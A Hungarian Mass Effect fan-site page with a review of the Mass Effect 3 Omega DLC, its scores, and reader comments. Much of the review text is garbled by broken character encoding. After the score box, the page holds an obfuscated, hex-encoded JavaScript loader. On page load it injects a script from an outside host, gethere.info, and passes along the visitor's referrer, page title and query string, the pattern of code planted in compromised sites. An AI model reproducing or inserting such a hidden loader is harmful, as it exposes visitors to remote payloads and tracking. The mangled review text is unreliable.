Üdvözlünk az SFportal nem hivatalos Mass Effect rajongói oldalán!

Kövess minket!



Vagy kérj e-mail értesítőt!

Enter your email address:

Delivered by FeedBurner

Mass Effect @ Google+

Mass Effect @ Facebook

A hivatalos magyar Mass Effect Facebook oldal

Csatlakozz!

A Mass Effect 3 tA�rtA�netA�ben hA?rom nagy lyuk van. VisszafelA� haladva az elsA� a legvA�ge, amit az Extended Cut DLC-vel A�s a Leviathannal betA�mtek. A mA?sodik a FellegvA?r importA?lA?sa a FA�ldre, amely legalA?bb annyi kA�rdA�st hagyott maga utA?n, mint anno a jA?tA�k vA�ge. Hogyan vittA�k A?t a KaszA?sok a FellegvA?rat a Naprendszerbe? Mi lett Bailey-vel, a tanA?ccsal, az A?llomA?st vA�dA�kkel? Ezekre egyelA�re nincs vA?lasz, de talA?n egy DLC majd ezeket a lyukakat is betA�mi. A harmadik A�s egyben utolsA? likacs pedig az Omega A?gye. Ez hasonlA? volt, mint anno a Mass Effect 2-ben Liara tA�rtA�nete. Ahogy ott, itt is kukA?n pislogtunk, hogy egy ilyen fontos sztori elemet miA�rt tudnak le piszlicsA?rA� adatgyA�jtA�getA�ssel A�s noname figurA?k kergetA�sA�vel. De mivel mA?r tanultunk a Lair of the Shadow BrokerbA�l, az ME3-nA?l a kukA?n pislogA?st megvilA?gosulA?s kA�vette: ja persze, letA�lthetA� tartalom lesz belA�le.

A From Ashes, az Extended Cut A�s a Leviathan utA?n meg is A�rkezett a negyedik single, vagy ha A?gy tetszik, harmadik tA�rtA�net DLC kA�pA�ben az Omega. Kicsit olyan, mint az Overlord, vagyis sok-sok akciA?t fA�znek fel egy alapjaiban vA�konyka tA�rtA�net szA?lA?ra. Viszont az Overlorddal ellentA�tben az Omega nem is prA?bA?l tA�bbet kA�nA?lni egy lA�vA�ldA�zA�s DLC-nA�l.

Aria elA�rkezettnek lA?tja az idA�t, hogy visszavegye a trA?njA?t, amit a Cerberus mA�g az Invasion kA�pregA�nyben foglalt el, nem sokkal az Arrival esemA�nyei utA?n. Sajnos, mint ahogy a korA?bbi visszautalA?sok esetA�ben, most sem tudunk meg tA�bbet a jA?tA�kbA?l az azokon kA�vA?li esemA�nyekrA�l, A�gy aki nem ismeri a kA�nyveket A�s kA�pregA�nyeket, a lA?tottakbA?l talA?n kevA�sbA� A�rti meg, miA�rt fA�l annyira Nyreen az AdjutantoktA?l, vagy miA�rt olyan nagy durranA?s Oleg Petrovsky tA?bornok. RA?adA?sul a bekezdA�s elsA� mondatA?val le is tudtam a sztorit, ennA�l tA�bbrA�l tA�nyleg nem szA?l, nincsenek vA?ratlan fordulatok, se sok szA?csA�plA�s, inkA?bb a fegyverekA� a szerep.

Ezen a tA�ren jA?l teljesA�t a DLC, mert az Omega visszafoglalA?sa legalA?bb olyan A�sszetett A�s vA?ltozatos feladat, mint az ember-VI hibrid David lekapcsolA?sa. ElA�szA�r be kell juttatnunk Aria zsoldosseregA�t az OmegA?ra, aztA?n szA�vetsA�get kell kA�tnA?nk a kA�nyvekbA�l mA?r ismert Talon zsoldos csoporttal. EztA?n jA�het az ostrom, csak elA�tte mA�g le kell kapcsolni a kA�zpontot elzA?rA? erA�tereket, a reaktorhoz viszont a bA?nyA?kon A?t vezet az A?t. AztA?n egy kis bombahatA?stalanA�tA?s, A�s mA?r mehetA?nk is Oleg bA?csit nyakon vA?gni. A vA�gsA� leszA?molA?s ezA?ttal sem fog fejtA�rA�st okozni. Ahogy az ME3 A�s a Leviathan vA�gA�n is, ezA?ttal sem bossfight vA?r rA?nk, hanem a vA�gtelentett hullA?mban A�rkezA� ellenfelek kereszttA?zA�ben kell megoldanunk egy roppant egyszerA� feladatot. Ennek a koncepciA?nak tovA?bbra sem A�rA?lA�k, hiszen Saren, a KaszA?s baba A�s az A?rnybrA?ker utA?n mA�g csak meg sem izzadunk a cerberus katonA?ktA?l vagy a KaszA?s kreA?lmA?nyoktA?l (jelen esetben az AdjutantoktA?l), akA?rhA?nyan jA�nnek.

FA?jA? pont mA�g szA?momra a zene. Az elA�zetes nagy, epikus pillanatokat A�gA�rt A�s mA?r elA�re dA�rzsA�ltem a kezem, milyen remek lesz hallgatni Aria beszA�dA�t, nA�zni az OmegA?ra lecsapA? zsoldosokata�� TA�nyleg jA? volt hallgatni azt a buzdA�tA? monolA?got, A�s nA�zni a csatA?kat, csak az epikussA?g maradt el, ugyanis nincs egy normA?lis zene a DLC alatt! Sorra jA�nnek a jobbnA?l jobb pillanatok, de a zene vA�gig uncsi alA?festA� muzsika, mint amilyenek az ME2 Atmospheric albumA?n vannak. JA?l mA�kA�dnek a tA�zharcok kA�zben, de nem akkor, amikor gA�pA?gyA?k tA�megesen kaszA?ljA?k le a Cerberus katonA?it. A?gy abba a szA?jhA?zA?s helyzetbe kerA?ltA?nk, hogy az elA�zetes epikusabb, mint maga a DLCa��

De legalA?bb jA? pA?lyA?kat kaptunk. Olyan vA?ltozatossA?gnak ugyan nem leszA?nk kitA�ve, mint a Leviathanban, elvA�gre itt egy A�rA?llomA?st jA?runk be, de a Bioware-nA?l azA�rt nem tudtA?k le egy kA�zlegyintA�ssel a dolgot. Majdnem minden pontrA?l pazar kilA?tA?s nyA�lik az OmegA?ra, a bA?nyA?k igen hangulatosak, a reaktor A?ll-leejtA�, az egykori jA?rvA?ny sA?jtotta terA?letek A�s az Afterlife pedig nosztalgiA?val tA�ltik el az embert. Persze csak akkor, ha korA?bban is kedveltA?k OmegA?t, hiszen itt minden sA�tA�t, mocskos A�s durva. A�n szemA�ly szerint csA�pem az ilyen Mos Eisley jellegA� helyeket, A�s talA?n csak annyi negatA�vumot rA?nA�k fel, hogy az Adjutantokkal sokkal hangulatosabb lett volna tA�k sA�tA�tben A�sszefutni.

Ellenfelek terA�n lA�nyegA�ben a szokA?sos a felhozatal. A Cerberus katonA?i mind tiszteletA?ket teszik, az Assault TroopertA�l a Phantomon A?t az Atlasig. MegA�lA�sA?k rutin ujjgyakorlat, plA?ne aktuA?lis tA?rsaink mellett. NA�mi kihA�vA?st a kA�t A?j jA?tA�kos, a Rampart Mech A�s a mA?r emlA�tett Adjutant jelenthet. Az elA�bbiek sokan vannak, gyorsak, jA?l pA?ncA�lozottak, rA?adA?sul kA�zelharcban is jeleskednek, nem A�ppen Loki Mechek. Az utA?bbiak a KaszA?s mumusok Cerberus vA?ltozata, lassA?ak, de jA?l ugranak (ez lett a teleportA?lA?si kA�pessA�gA?kbA�l, ami miatt nem kerA?lhettek be az alapjA?tA�kba), viszonylag masszA�vak A�s kaptak egy biotikus lA�fegyvert.

Ami tA?rsainkat illeti, nos, Aria kA�vA?nsA?gA?ra otthon maradtak, A�gy be kell A�rnA?nk a kalA?zkirA?lynA�vel A�s egy Talon zsoldos turian nA�vel, Nyreennel. Mindketten igen erA�s kA�pessA�gekkel lettek megA?ldva, fA�leg Aria, szabA?lyos biotikus istencsapA?s. KarakterkA�nt is A� az A�rdekesebb, Shepard viselkedA�se ugyanis rA? is hatA?ssal van, A�gy mA?s a jA?tA�k vA�ge Renegate A�s Paragon behatA?sok esetA�n. Na persze ezA?ttal is Mass Effect stA�lusban, vagyis csak annyit dA�nthetA?nk el, hogy merre fordulunk 360 fokot, a tA�rtA�net sodrA?sA?ba tovA?bbra sincs beleszA?lA?sunk A�s dA�ntA�seinknek sincsenek lA�nyeges kA�vetkezmA�nyei, azon kA�vA?l, hogy mennyi plusz pontunk lesz a jA?tA�k vA�gA�n.

Az Omega tehA?t egy akciA?kA�zpontA?, nudli tA�rtA�netA�, sA�tA�t hangulatA? DLC, ami betA�m egy nagy lyukat a Mass Effect 3 sztorijA?ban. Az ostrom kellA�en vA?ltozatos, a pA?lyA?k lA?tvA?nyosak, a fA�kA?ldetA�sek mellett megoldhatunk hA?rom alkA?ldetA�st is. Carrie-Anne Moss viszi a hA?tA?n a jA?tA�kot; az A?j ellenfelek jA?l mA�kA�dnek, bA?r az Adjutantokat jobban is kihasznA?lhattA?k volna. A zene csapnivalA?, ami agyonvA?gja a legtA�bb nagyszabA?sA?nak szA?nt jelenetet.

Pro: akciA? dA?s, visszatA�rhetA?nk OmegA?ra, Aria
Kontra: a sztori vA�konyka, a zene csapnivalA?

Grafika: 90%
Hang: 75%
JA?tA�kA�lmA�ny: 85%

A�SSZ.: 83%

var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Mass Effect 3: Omega DLC teszt bejegyzéshez 1 184 hozzászólás

  • Az a baj hogy pont azokkal a dolgokkal lehetett volna jóvá tenni a dlc-t amiket hiányolunk. Így már tényleg csak az élvezi akinek tök mindegy mire csak lőjön, meg aki esetleg szerette annyira Omegát, hogy a vörös árnyalataiban pompázó gettóban jól érezze magát esetleg aki menthetetlenül fan. Mégha a valóban hajszál vékony sztori felett szemet hunyunk (mert hát komolyan, ki mire számított?), több helyen vérlázító amit a rendezéssel és a zenével, vagyis inkább azok hiányával csináltak. A játék vége félelmetesen érdektelen lett pont ezért, és ez annak fényében idegesítő hogy mit lehetett volna kihozni belőle :. Azért jó esti szórakozás volt, de a pénzt nem érte meg XD

  • Azon meg röhögtem hogy Aria a hatalmas újjáépítést a fellegváron unatkozva ücsörögve végzi. Erre valahogy figyelhettek volna hogy nagyon gagyin veszi ki magát XD

  • Hirtelen ennyi visszafogott véleményemnek tudtam hangot adni, de amúgy a cikk tök korrekt lett ;).
    Reméljük a kövi DlC már jobb lesz.

  • joejoejoe szerint:

    Igazad van. Lehetséges, hogy a kövi DLC témája a Citadel lesz.
    link

    Magánvélemény: kezd hányingerem lenni az ilyenektől. Azt egy klassz dolognak tartom, hogy csinálnak DLC-ket, ami berak valami teljesen új helyszínt, amire az alapjátékba említés szintjén sem volt utalás. Ugyan a kettőnél is kihagytam minden fizetőset, de abszolúte jó ötletnek tartottam, hogy így lehet bővíteni a játékot. De az hogy kihagynak fontos részleteket a játékból, aztán külön eladják nekünk és csak azokkal érthető teljes egészében a történet, azt már egyáltalán nem vagyok hajlandó lenyelni. Ez egy aljas, szemét viselkedés.

    Pluszba még ez a 3 DLC árilag már az alapjáték árát súrolja.

    Örültem a trilógia csomagnak, mint majom a farkának, hogy majd a DLC-ket be tudom szerezni emészthető áron, az összes részről lesz biztonsági másolat, ráadásul szép dobozban. Ahha, az a kiadás nemhogy a harmadik rész elkészült DLC-it, de még a második részét sem tartalmazza. Hát kösz szépen.

  • Merras szerint:

    Nekem pont a nudli történettel van gondom az Omega kapcsán. Az Overlordnak legalább volt egy érdekes története, még ha alapvetően akcióközpontú is volt, és amúgy nagyon jó külön zenét is toltak hozzá. Plusz érdekes volt az utolsó, augmented realitys pályája.

    Engem nem nagyon csigázott fel az, hogy szétkenhetem egy csomó Cerberus katona száját, ez ugyanis napi program a multiplayerben. 🙂 És némi Gold / Platinum szintű multis tapasztalattal a hátam mögött nem volt egy nagy kihívás a DLC, főleg, hogy 60. szintű biotic Sheparddal mentem neki. 😀 Nyreennel mindig toltam egy Incinerate-et, utána Sheparddal rádobtam ugyanarra a célpontra egy Warpot, amitől felrobban az Incinerate, jó kis területi sebzést okozva, majd a Warpot felrobbantottam vagy egy Throw-al, vagy pedig Aria saját biotic képességével.

    Nyilván persze annak, aki nem multizik sokat, annak jó kis kihívás lehet az Omega, de akkor is… a Mass Effect a sztorijáért, a karaktereiért Mass Effect, nem csak a harcért. Össze lehetne hasonlítani az Omegát a Lair of the Shadow Brokerrel is amúgy: ez utóbbi is baromira akcióközpontú, ha nagyon lecsupaszítom, akkor két fő részbe sűrített folyamatos harcból áll. Mégis, az átvezető videók, vagy akár a harc közbeni beszólások oltáriak. Kár volt lejjebb adni a minőségből.

  • dzsejt szerint:

    Én mondjuk nem játszok sokat a multival, így nem lett napi rutin a cerbek mészárlása, bár mivel nemmondommeghanyadszorra játszom ki az ME3-at, így azért mégis. 🙂 Azért ha tesznek alá valami dögös zenét, és esetleg a társaink is velünk tarthattak volna – legalább Garrus -, akkor simán lehetett volna ebből az ME3 Lair of the Shadow Brokere. Mert azért na, Garrus Arria és a Talon oldalán egy turian csaj mellett, az olyan szövegeket eredményezhetett volna, hogy a földön gurultunk volna a rötyögéstől. A zene meg… Nos, hadd ne soroljam fel azokat a jeleneteket, amelyek a zene miatt lettek olyan hatalmasak, hogy önmagukban is simán vissza merem nézni.

  • Valyon Tamás szerint:

    A következő zenéje állítólag megríkat majd… Én benne vagyok, de annak tényleg tegyék oda magukat, mert nekem most az Omega és korábban a Leviathan után is volt némi keserű szájízem. A Leviben főleg a snassz végét nem csíptem.